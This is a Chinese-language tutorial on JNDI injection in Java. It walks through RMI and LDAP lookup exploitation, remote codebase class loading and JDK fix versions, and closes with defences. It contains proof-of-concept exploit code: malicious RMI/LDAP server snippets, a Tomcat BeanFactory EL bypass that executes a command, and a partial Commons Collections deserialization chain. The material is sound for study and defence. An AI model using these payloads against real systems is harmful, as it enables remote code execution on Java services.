JNDI注入安全研究：从原理到利用<\/h1>

1. JNDI基础概念<\/h2>
JNDI (Java Naming and Directory Interface) 是用于目录服务的Java API，它允许Java客户端通过名称发现和查找数据和资源（以Java对象的形式）。关键特性包括：<\/p>
独立于底层实现<\/li>
提供SPI (Service Provider Interface) 允许将目录服务实现插入框架<\/li>
查询信息可能来自服务器、文件或数据库<\/li> <\/ul>
2. JNDI注入基础利用<\/h2>

2.1 RMI协议利用<\/h3>

基本示例<\/h4>
服务端代码<\/strong>：<\/p>
public<\/span> class<\/span> JNDIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>        initialContext.<\/span>rebind<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteOb"<\/span>,<\/span> new<\/span> RemoteObImpl());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>客户端代码<\/strong>：<\/p>
public<\/span> class<\/span> JNDIClient<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        IRemoteObj o =<\/span> (<\/span>IRemoteObj)<\/span> initialContext.<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:1099\/remoteOb"<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>o.<\/span>sayHello<\/span>(<\/span>"hello"<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击原理<\/h4>
当客户端lookup<\/code>参数可控时，可以使其访问恶意RMI链接。攻击流程：<\/p>

客户端调用lookup<\/code>方法<\/li>
最终调用RegistryContext<\/code>类的lookup<\/code>方法<\/li>
获取ReferenceWrapper_Stub<\/code>对象<\/li>
服务端通过encodeObject<\/code>将Reference<\/code>转为ReferenceWrapper<\/code><\/li>
客户端获取后进行decode<\/code>操作<\/li>
<\/ol>
2.2 引用对象绑定<\/h3>
恶意服务端示例<\/strong>：<\/p>
public<\/span> class<\/span> JNDIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        Reference reference =<\/span> new<\/span> Reference(<\/span>"TestRef"<\/span>,<\/span> "TestRef"<\/span>,<\/span> "http:\/\/localhost:6666\/"<\/span>);<\/span>
<\/span><\/span>        initialContext.<\/span>rebind<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteOb"<\/span>,<\/span> reference);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Reference<\/code>类关键参数：<\/p>

className<\/code>: 对象类名<\/li>
factory<\/code>: 工厂类名<\/li>
factoryLocation<\/code>: 工厂加载位置(URL)<\/li>
<\/ul>
攻击流程<\/h4>

客户端获取Reference<\/code>后调用NamingManager.getObjectInstance()<\/code><\/li>
调用getObjectFactoryFromReference<\/code>从引用获取对象工厂<\/li>
首先尝试本地AppClassLoader<\/code>加载（失败）<\/li>
使用codebase<\/code>(factoryLocation)通过URLClassLoader<\/code>加载远程类<\/li>
实例化并执行恶意代码<\/li>
<\/ol>
2.3 JDK修复措施<\/h3>
在以下版本中Java限制了RMI远程加载：<\/p>

JDK 6u132<\/li>
JDK 7u122<\/li>
JDK 8u113<\/li>
<\/ul>
修复方式：<\/p>

将com.sun.jndi.rmi.object.trustURLCodebase<\/code><\/li>
com.sun.jndi.cosnaming.object.trustURLCodebase<\/code>

默认值设为false<\/code><\/li>
<\/ul>
3. LDAP协议利用<\/h2>
3.1 LDAP与RMI的区别<\/h3>
在以下版本前LDAP仍可利用：<\/p>

JDK 11.0.1<\/li>
8u191<\/li>
7u201<\/li>
6u211<\/li>
<\/ul>
客户端示例<\/strong>：<\/p>
public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>    Object object =<\/span> new<\/span> InitialContext().<\/span>lookup<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/koh13g"<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击流程<\/h4>

调用栈进入PartialCompositeContext.lookup<\/code><\/li>
调用p_lookup<\/code>和c_lookup<\/code>方法<\/li>
调用decodeObject<\/code>方法（与RMI不同实现）<\/li>
判断为引用时调用decodeReference<\/code><\/li>
调用DirectoryManager.getObjectInstance()<\/code><\/li>
后续流程与RMI类似，通过codebase<\/code>加载<\/li>
<\/ol>
3.2 LDAP修复措施<\/h3>
在以下版本中修复：<\/p>

JDK 11.0.1<\/li>
8u191<\/li>
7u201<\/li>
6u211<\/li>
<\/ul>
将com.sun.jndi.ldap.object.trustURLCodebase<\/code>默认值设为false<\/code><\/p>
4. 高版本JDK绕过技术<\/h2>
4.1 利用本地类<\/h3>
要求：<\/p>

类必须实现javax.naming.spi.ObjectFactory<\/code>接口<\/li>
必须存在getObjectInstance()<\/code>方法<\/li>
常用类：org.apache.naming.factory.BeanFactory<\/code>（Tomcat依赖）<\/li>
<\/ol>
服务端示例<\/strong>：<\/p>
public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1097<\/span>);<\/span>
<\/span><\/span>    ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>    ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>    ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"<\/span>));<\/span>
<\/span><\/span>    ReferenceWrapper referenceWrapper =<\/span> new<\/span> com.<\/span>sun<\/span>.<\/span>jndi<\/span>.<\/span>rmi<\/span>.<\/span>registry<\/span>.<\/span>ReferenceWrapper<\/span>(<\/span>ref);<\/span>
<\/span><\/span>    registry.<\/span>bind<\/span>(<\/span>"Object"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击流程<\/strong>：<\/p>

指定本地工厂类org.apache.naming.factory.BeanFactory<\/code><\/li>
通过getObjectFactoryFromReference<\/code>本地加载<\/li>
反射调用invoke<\/code>执行EL表达式<\/li>
<\/ol>
4.2 触发本地Gadget<\/h3>
利用本地存在的漏洞依赖（如Commons Collections）<\/p>
服务端示例<\/strong>：<\/p>
private<\/span> static<\/span> byte<\/span>[]<\/span> CommonsCollections5<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>        new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[]{}}),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[]{}}),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>    };<\/span>
<\/span><\/span>    \/\/ ... 构造CC链
<\/span><\/span><\/span><\/span>    return<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>LDAP属性设置<\/strong>：<\/p>
e.<\/span>addAttribute<\/span>(<\/span>"javaClassName"<\/span>,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>e.<\/span>addAttribute<\/span>(<\/span>"javaSerializedData"<\/span>,<\/span> CommonsCollections5());<\/span>
<\/span><\/span><\/code><\/pre>反序列化流程<\/h4>

进入Obj.decodeObject<\/code>方法<\/li>
检查javaSerializedData<\/code>属性<\/li>
调用deserializeObject<\/code>反序列化恶意数据<\/li>
<\/ol>
4.3 通过javaReferenceAddress反序列化<\/h3>
服务端设置<\/strong>：<\/p>
e.<\/span>addAttribute<\/span>(<\/span>"javaClassName"<\/span>,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>e.<\/span>addAttribute<\/span>(<\/span>"javaReferenceAddress"<\/span>,<\/span> "$1$String
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>"<\/span> +<\/span> new<\/span> BASE64Encoder().<\/span>encode<\/span>(<\/span>CommonsCollections5()));<\/span>
<\/span><\/span>e.<\/span>addAttribute<\/span>(<\/span>"objectClass"<\/span>,<\/span> "javaNamingReference"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>要求<\/strong>：<\/p>

javaReferenceAddress<\/code>格式：

第一个字符为分隔符<\/li>
第一与第二分隔符间为int类型position<\/li>
第二与第三分隔符间为type<\/li>
第三个分隔符为双分隔符时触发反序列化<\/li>
<\/ul>
<\/li>
数据需Base64编码<\/li>
javaClassName<\/code>属性必须存在<\/li>
<\/ol>
5. 防御措施<\/h2>

升级JDK到安全版本<\/li>
限制JNDI查找参数不可控<\/li>
设置系统属性限制远程加载：
System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.rmi.object.trustURLCodebase"<\/span>,<\/span> "false"<\/span>);<\/span>
<\/span><\/span>System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.cosnaming.object.trustURLCodebase"<\/span>,<\/span> "false"<\/span>);<\/span>
<\/span><\/span>System.<\/span>setProperty<\/span>(<\/span>"com.sun.jndi.ldap.object.trustURLCodebase"<\/span>,<\/span> "false"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
检查并移除不必要的危险依赖<\/li>
<\/ol>
6. 参考链接<\/h2>

Exploiting JNDI Injections in Java - Veracode<\/a><\/li>
JNDI注入漏洞分析 - 阿里云社区<\/a><\/li>
JNDI注入相关视频教程 - Bilibili<\/a><\/li>
<\/ol>
JNDI注入安全研究：从原理到利用<\/h1>

2. JNDI注入基础利用<\/h2>

2.1 RMI协议利用<\/h3>

3. LDAP协议利用<\/h2>

6. 参考链接<\/h2> Exploiting JNDI Injections in Java - Veracode<\/a><\/li> JNDI注入漏洞分析 - 阿里云社区<\/a><\/li> JNDI注入相关视频教程 - Bilibili<\/a><\/li> <\/ol>

6. 参考链接<\/h2>

Exploiting JNDI Injections in Java - Veracode<\/a><\/li>
JNDI注入漏洞分析 - 阿里云社区<\/a><\/li>
JNDI注入相关视频教程 - Bilibili<\/a><\/li> <\/ol>
